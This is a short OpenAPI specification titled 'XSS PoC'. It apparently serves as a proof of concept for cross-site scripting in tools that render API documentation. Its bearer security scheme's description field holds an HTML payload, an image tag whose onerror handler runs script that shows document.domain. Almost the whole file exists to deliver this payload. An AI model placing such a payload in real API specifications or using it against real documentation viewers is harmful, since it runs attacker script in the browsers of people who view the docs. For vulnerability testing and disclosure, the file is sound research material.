openapi: 3.0.0
info:
  title: XSS PoC
  version: 1.0.0
components:
  securitySchemes:
    bearer:
      type: http
      scheme: bearer
      bearerFormat: JWT
      description: '<img src=x onerror=alert(document.domain)>'
